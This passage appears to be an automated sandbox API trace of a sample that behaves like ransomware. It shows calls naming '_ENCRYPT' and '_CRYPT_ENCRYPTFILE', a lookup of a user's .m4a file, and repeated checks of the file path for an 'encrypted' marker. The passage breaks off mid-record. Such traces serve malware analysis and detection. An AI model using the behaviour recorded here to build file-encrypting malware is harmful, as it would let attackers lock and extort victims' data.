| out: hHeap=0x770000) returned 1 [0031.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0031.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0031.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0031.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0031.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0031.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0031.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0031.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0031.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.680] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0031.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0031.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.680] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.680] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0031.680] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.680] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0031.680] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0031.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.680] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.680] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.680] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.680] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d88b1e0, ftCreationTime.dwHighDateTime=0x1d5be72, ftLastAccessTime.dwLowDateTime=0x7e10b2e0, ftLastAccessTime.dwHighDateTime=0x1d5c4a1, ftLastWriteTime.dwLowDateTime=0x7e10b2e0, ftLastWriteTime.dwHighDateTime=0x1d5c4a1, nFileSizeHigh=0x0, nFileSizeLow=0x42e1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="yRQDF_aSfhekn.m4a", cAlternateFileName="YRQDF_~1.M4A")) returned 0x7c20c0 [0031.680] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.680] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.680] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d88b1e0, ftCreationTime.dwHighDateTime=0x1d5be72, ftLastAccessTime.dwLowDateTime=0x7e10b2e0, ftLastAccessTime.dwHighDateTime=0x1d5c4a1, ftLastWriteTime.dwLowDateTime=0x7e10b2e0, ftLastWriteTime.dwHighDateTime=0x1d5c4a1, nFileSizeHigh=0x0, nFileSizeLow=0x42e1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="yRQDF_aSfhekn.m4a", cAlternateFileName="YRQDF_~1.M4A")) returned 0x7c20c0 [0031.681] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.681] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="33uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NI\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lK15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="15Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vz5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yRQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RQDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QDF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DF_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aSfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sfhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fhekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hekn.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.683] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.683] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0031.683] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.683] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.683] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.683] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.683] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.683] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.683] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d88b1e0, ftCreationTime.dwHighDateTime=0x1d5be72, ftLastAccessTime.dwLowDateTime=0x7e10b2e0, 